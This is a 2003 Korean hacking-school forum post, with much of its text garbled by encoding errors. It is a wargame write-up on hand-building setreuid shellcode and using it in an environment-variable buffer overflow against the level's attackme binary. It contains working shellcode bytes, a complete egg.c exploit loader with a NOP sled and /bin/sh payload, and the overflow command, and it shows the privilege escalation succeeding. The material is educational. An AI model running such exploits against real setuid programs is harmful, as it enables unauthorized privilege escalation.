http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=681 [º¹»ç]
>shellcode Á¦ÀÛÇÏ´Â ¹æ¹ýÀ» ¾Ë°í ½ÍÀºµ¥¿ä...
>¿©±âÀú±â ã°í °øºÎÇÏ°í´Â Àִµ¥..
>¾î¼À´É·ÂÀÌ ºÎÁ·Çϼ ¸·È÷³×¿ä...
>level19 ¿¡¼ setreuid()ÀÇ shellcode¸¦ ¸¸µé°í ÀÖ½À´Ï´Ù.
>
>shellcode¿¡ ´ëÇÏ¿© °øºÎÇÒ ¼ö ÀÖ´Â °÷À̳ª
>ÀÚ·á°¡ ÀÖ´Â °÷ÀÌ ÀÖÀ¸¸é ¾Ë·ÁÁÖ½Ã¸é °í¸¿°Ú½À´Ï´Ù.....
>
>........ÇØÅ·¿¡ ¾î¼ÀÀÌ Çʼö¿´³ª¿ä?...^^;
°í»ý°í»ý ÇÏ´Ù°¡......ÁÁÀº ÀÚ·á°¡ Àֱ淡 ..¿Ã·Áº¾´Ï´Ù...½©Äڵ嶫¿¡ °í»ýÇϽô ºÐµé.....µµ¿òÀÌ µÇ¼ÌÀ¸¸é ÇÕ´Ï´Ù....
http://ttongfly.net ¿¡ "night´ÔÀÇ setreuid() ½©ÄÚµå ¸¸µé±â" ÀÔ´Ï´Ù..
¹«´ÜÀ¸·Î ¿Ã·Áµµ µÇ´ÂÁö....^^;
======================================================================
호욱이의 허접스러운 쉘코드 만들기
0x01. 서론
0x02. 본론 -step1, 2
~서론.
³»°¡ ¿äÁò¿¡ ±è¼±¿ì ¶ó´Â ÀÛÀÚ ¶§¹®¿¡ HackerSchool ·¹º§À» ´Ù½Ã ½ÃÀÛÇϰԵǾú´Ù. ÇÏÁö¸¸ ÀÌ°Ô ¹«½¼ ÀÏÀΰ¡? ¿¹Àü¿¡
Ç®¾ú´ø ¹®Á¦°¡ ¾È Ç®¾îÁö´Â°Ô ¾Æ´Ñ°¡.. Á» Â¥ÁõÀÌ ³µ´Ù. À߸ø ÇÏÁöµµ ¾Ê¾Ò°í, ½©µµ Á¦´ë·Î ¶³¾îÁö´Âµ¥
¿Ö? °ð ±è¼±¿ì¶ó´Â ³ðÀÌ ¾Ë·ÁÁÖ´õ¶ó.. ±×¸®°í ½ÅÁ¤ÈÆ ´ÔÀÌ Á¦ÀÛÇϽŠsetreuid(3092, 3092) ÀÇ
½©Äڵ带 °®°í ¿Í¼ Åë°úÇÏ´õ±º.. ÇÏÁö¸¸ ¿ì¸° ¸·Çû´Ù. ·¹º§12->13 Àº ¾î¶»°Ô Åë°ú ÇÒ °ÍÀΰ¡? ±×·¡¼ Á÷Á¢
¸¸µé¾îº¸±â·Î Çß´Ù. ±×¸®°í ¼º°øÇß´Ù. ¾ÆÁ÷ ±âÃÊÀûÀÎ ´Ü°èÁö¸¸ ±â»¼´Ù. Âü°í·Î ÀÌ ¹®¼´Â ¿À·ù °¡
¾ö.û.³ª.°Ô ¸¹´Ù. ³Ê±×·´°Ô °íÃÄÁֱ⠹ٶõ´Ù.
~본론.
step 1. assembly programming
³ ´Ù¸¥ °÷À¸·Î ¿¹Á¦¸¦ º¸¸é¼ ÇÏ´Â°É ½È¾îÇÑ´Ù..(¸øÇÏ´Â °Å´Ù »ç½Ç) ¿©ÇÏÆ°, ½©ÄÚµå ¸¦ Á¦ÀÛÇÏ·Á¸é assembly
¿¡ ´ëÇÑ ¾ÆÁÖ ±âº»Áö½ÄÀº ÀÖ¾î¾ßÇÑ´Ù. ¿ì¼± °¢ ·¹Áö½ºÅÍÀÇ °ªÀ» ¾Ë¾Æ³»°í.. ÇÔ¼öÀÇ °íÀ¯¹øÈ£ ¾Ë¾Æ³»°í..
ÀÎÅÍ·´Æ® È£ÃâÇÏ°í.. ¿©±â¼ ·¹Áö½ºÅͶó ÇÔÀº eax, ebx, ecx.... ÀÌ´Ù.
¿¹)
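#include <unistd.h>

/* The C equivalent of the assembly shown below: set the real and effective
 * uid of the process to 3092 (level12's uid, see the `id` output at the end). */
int main(void)
{
    setreuid(3092, 3092);
    return 0;
}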
¿©±â¼ º¸¸é
eax ¿¡´Â setreuid °¡ µé¾î°¡°í..
ebx ¿¡´Â 3092
ecx ¿¡µµ 3092
ÀÌ·± ½ÄÀ¸·Î µé¾î°£´Ù. ÁÖ·Î eax ´Â ÇÔ¼öÀÇ °íÀ¯¹øÈ£¸¦ È£Ãâ ÇÒ¶§ ¾²¿© Áö´Â°Í ¾Ë°íÀÖ´Ù. ¾Æ´Ò¼öµµ? (system call)
³»°¡ ÀÌ°É ¾µ Áö½ÄÀÌ ¾È µÈ´Ù..
[level11@ftz tmp]$ cat > a.c
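#include <unistd.h>

/* a.c: same program as the first example. The original listing had a typo,
 * setreuid(3092, 3902); both arguments are 3092 everywhere else in the post
 * and in the assembly below (0x0c14 == 3092 for ebx and ecx). */
int main(void)
{
    setreuid(3092, 3092);
    return 0;
}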
ÀÌ°É ¾î¼Àºí¸®¾î·Î ÇÁ·Î±×·¡¹ÖÇÏ¸é ´ë·« ÀÌ·¸´Ù.
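xor %eax, %eax      # eax = 0
mov $0x14, %al      # al = 0x14
mov $0xc, %ah       # ah = 0x0c -> eax = 0x0c14 = 3092 (al/ah are the low/high byte of ax)
mov %eax, %ebx      # ebx = 3092, first argument (ruid)
mov %ebx, %ecx      # ecx = 3092, second argument (euid)
xor %eax, %eax      # clear eax again before loading the syscall number
mov $0x46, %al      # al = 0x46 = 70, the setreuid syscall number (byte move, matching setreuid.c and the objdump below)
int $0x80           # invoke the kernel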
À§ÀÇ al, ah Àº °¢°¢ 1byte ÀÌ´Ù.^^ (»ç½Ç ÇÊÀÚµµ È®½ÇÈ÷ ¸ð¸§.)
ÀúÀ§ÀÇ assembly ÄÚµå´Â C ÀÇ
setreuid(3092, 3092); ÀÇ ÄÚµå¿Í °°´Ù.
eax ebx ecx
»ý°¢Çغ¸¸é º°·Î ¾î·Á¿î °Íµµ ¾Æ´Ï´Ù. ÇÏÁö¸¸ ¾î¼Àºí¸®¾îÀÇ ±âº»Áö½ÄÀº ÀÖ¾î¾ßÇÑ´Ù.
(ÇÊÀÚ´Â ¾ø´Ù. ´ëÃæ ÇÊ¿äÇÑ ¸í·ÉµéÀ» Àá½Ã ¿Ü¿öµÐ°Å»ÓÀÌ´Ù.)
step 2. shellcode 만들기
À§¿¡¼ ¸¸µç Äڵ带 °¬°í ÀÌ·± ½ÄÀ¸·Î ÄÄÆÄÀÏ ÇÑ´Ù.
[level11@ftz tmp]$ cat > setreuid.c
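/* setreuid.c: issues setreuid(3092, 3092) directly through int 0x80
 * (32-bit Linux: eax = syscall number, ebx/ecx = first/second argument).
 * Each instruction is its own string piece joined with "\n\t": the
 * multi-line string literal of the original listing is rejected by
 * current gcc versions. */
int main(void)
{
    __asm__(
        "xor %eax, %eax\n\t"
        "mov $0x14, %al\n\t"
        "mov $0xc, %ah\n\t"       /* eax = 0x0c14 = 3092 */
        "mov %eax, %ebx\n\t"      /* ruid */
        "mov %ebx, %ecx\n\t"      /* euid */
        "xor %eax, %eax\n\t"
        "mov $0x46, %al\n\t"      /* 70 = setreuid syscall number */
        "int $0x80\n\t"
    );
    return 0;
}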
[level11@ftz tmp]$ gcc -o setreuid setreuid.c -mpreferred-stack-boundary=2
-mpreferred-stack-boundary=2 ÀÇ ¶æÀº stack ÀÌ gcc 2.91 ÀÏ ¶§ÀÇ ¸ð½ÀÀ¸·Î ÄÄÆÄÀÏ Ç϶õ ¶æÀÌ´Ù.
[level11@ftz tmp]$ objdump -d setreuid
setreuid: file format elf32-i386
... 생략 ....
080483d0 <main>:
80483d0: 55 push %ebp
80483d1: 89 e5 mov %esp,%ebp
80483d3: 31 c0 xor %eax,%eax
80483d5: b0 14 mov $0x14,%al
80483d7: b4 0c mov $0xc,%ah
80483d9: 89 c3 mov %eax,%ebx
80483db: 89 d9 mov %ebx,%ecx
80483dd: 31 c0 xor %eax,%eax
80483df: b0 46 mov $0x46,%al
80483e1: cd 80 int $0x80
80483e3: 5d pop %ebp
80483e4: c3 ret
80483e5: 8d 76 00 lea 0x0(%esi),%esi
80483e8: 90 nop
80483e9: 90 nop
80483ea: 90 nop
80483eb: 90 nop
80483ec: 90 nop
80483ed: 90 nop
80483ee: 90 nop
80483ef: 90 nop
... 생략 ...
ÀÌÁ¦ ³²Àº °Ç ½©ÄÚµå ¸¦ ÀúÀ§¿¡¼ »Ì±â¸¸ ÇÏ¸é µÈ´Ù. ÀúÀ§ÀÇ ¾²·¹±âµé¸¸ ¾à°£ Ä¡¿ì°í..
¿ì¸®°¡ ÁÖ¸ñ ÇؾߵɰÍÀº ÀÌ ºÎºÐÀÌ´Ù.
80483d3: 31 c0 xor %eax,%eax
80483d5: b0 14 mov $0x14,%al
80483d7: b4 0c mov $0xc,%ah
80483d9: 89 c3 mov %eax,%ebx
80483db: 89 d9 mov %ebx,%ecx
80483dd: 31 c0 xor %eax,%eax
80483df: b0 46 mov $0x46,%al
80483e1: cd 80 int $0x80
ÄÚµå¿Í ºñ½ÁÇÏÁö ¾ÊÀº°¡? ¶È°°´Ù. ±×Àú hex code ·Î Ãâ·Â ÇØÁØ°ÎÀÌ´Ù.
Àú±â¼ ½©ÄÚµå °¡ ³ª¿Â´Ù.
"\x31\xc0\xb0\x14\xb4\x0c\x89\xc3\x89\xd9\x31\xc0\xb0\x46\xcd\x80"
ÇÏÇÏ.. ÀÌ°É ±âÁ¶ ½©ÄÚµå ÀºÎºÐ ¿¡ Ãß°¡¸¸ ÇØÁÖ¸é µÈ´Ù.
Âü°í·Î Àú°Ç HackerSchool level12( setreuid(3092, 3092) ) ½©ÄÚµå´Ù.
½ÃÇèÇغ¸°Ú´Ù..^^
[level11@ftz tmp]$ cat > egg.c
#include <stdlib.h>
#define DEFAULT_OFFSET 0        /* subtracted from the stack pointer sampled by get_esp(); argv[2] overrides */
#define DEFAULT_BUFFER_SIZE 512 /* size of the RET= buffer; argv[1] overrides */
#define DEFAULT_EGG_SIZE 2048   /* size of the EGG= buffer; argv[3] overrides */
#define NOP 0x90                /* x86 `nop` opcode (see the objdump listing above) */
/* Payload placed after "EGG=" in the environment: the 16 bytes extracted
 * above (setreuid(3092, 3092) via int 0x80) in front of the shellcode the
 * post already had. */
char shellcode[] =
"\x31\xc0\xb0\x14\xb4\x0c\x89\xc3\x89\xd9\x31\xc0\xb0\x46\xcd\x80" // added setreuid(3092, 3092) shellcode
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" // pre-existing shellcode
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* Returns the current stack pointer: copies %esp into %eax, the i386 return
 * register, and falls off the end without a `return`. The result is only
 * meaningful while the compiler leaves %eax untouched between the asm
 * statement and the function's `ret` — nothing in the code enforces that. */
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
/* Builds two environment variables and starts an interactive bash that
 * inherits them:
 *   RET= : `bsize` bytes holding the guessed stack address repeated every 4 bytes
 *   EGG= : `eggsize` bytes of NOP (0x90) followed by `shellcode`
 * argv[1] = bsize, argv[2] = offset, argv[3] = eggsize (all optional).
 * NOTE(review): printf/strlen/memcpy are used without <stdio.h>/<string.h>
 * (only <stdlib.h> is included), so they are implicitly declared; the gcc
 * output below the listing only warns about `void main`. */
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
/* NOTE(review): the atoi() results are not range-checked. A bsize that is
 * not a multiple of 4 makes the last 4-byte store below overrun buff, and an
 * eggsize <= strlen(shellcode) + 1 wraps the size_t subtraction in the NOP
 * loop so it runs past egg. */
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0); /* exits with status 0 even though allocation failed */
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset; /* guessed address; printed as "Using address" (0xbffffab8 in the transcript) */
printf("Using address: 0x%x\n", addr);
/* buff = addr, addr, addr, ... one copy per 4 bytes */
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
/* egg = NOPs up to eggsize - strlen(shellcode) - 1, then the shellcode, then one byte left for the NUL */
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
/* the first 4 bytes of each buffer become the variable name, so the rest of
 * the buffer is the value of EGG / RET once putenv() installs the string */
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/bin/bash"); /* the child shell inherits EGG and RET */
}
[level11@ftz tmp]$ gcc -o egg egg.c
egg.c: In function `main':
egg.c:19: warning: return type of `main' is not `int'
[level11@ftz tmp]$ ./egg
Using address: 0xbffffab8
[level11@ftz tmp]$ cd ..
[level11@ftz level11]$ perl -e 'system "./attackme","123456789012345678901234567890123456789012345678901234567890123456 78901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345
678901234567890123456789012345678901234567890123456789012345678901234567890\xb8\xfa\xff\xbf"'
sh-2.05a$ id
uid=3092(level12) gid=3091(level11) groups=3091(level11)
sh-2.05a$
성공이다. 목표달성....^^
ÀоîÁֽŠ¸ðµç ºÐµé²² °¨»çÇÑ´Ù. µýÁö Çѹø¾¿ ²À ºÎŹÇÑ´Ù.. ¿åÀº»çÀý~
도움 주신분들
n3wb13 님
sjh21a 님
참고문헌
Willy 님의 *** How to make shellcode in linux for beginners ***
Hit : 5966 Date : 2003/11/25 07:10